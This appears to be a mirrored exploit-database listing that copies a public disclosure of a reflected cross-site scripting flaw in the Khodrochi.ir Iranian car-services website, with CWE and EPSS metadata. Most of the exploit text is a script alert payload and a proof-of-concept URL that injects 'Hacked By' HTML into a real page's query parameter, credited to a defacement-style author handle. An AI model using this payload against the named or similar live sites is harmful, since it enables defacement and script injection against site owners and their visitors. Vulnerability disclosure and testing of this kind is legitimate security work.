Khodrochi.ir CMS - Iranian Car Services Platform - XSS

CVE	Category	Price	Severity
N/A	CWE-79	N/A	Medium

Author	Risk	Exploitation Type	Date
N/A	High	Remote	2022-05-29

CPE
cpe:cpe:/a:khodrochi:ir-cms-iranian-car-services-platform

CVSS	EPSS	EPSSP
Not available	0.02192	0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022050087

Below is a copy:

Khodrochi.ir CMS - Iranian Car Services Platform - XSS

=========================================================
# Exploit Title: Khodrochi.ir CMS - Iranian Car Services Platform - XSS
# Google Dork: -
# Date: 2022-05-27
# Exploit Author: Mr.B3nY
# Vendor Homepage: www.khodrochi.ir
# Tested on: Parrot OS
# Vulnerability : Cross Site Scripting (XSS)
=========================================================
[+] PAYLOAD : "<script>alert("XSS BY Mr.B3nY")</script>
=========================================================
[+] POC    :- https://khodrochi.ir/specification/report.php?q="<p style="text-align:center;font-size:5rem">Hacked By Mr.B3nY</p><!--
=========================================================

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum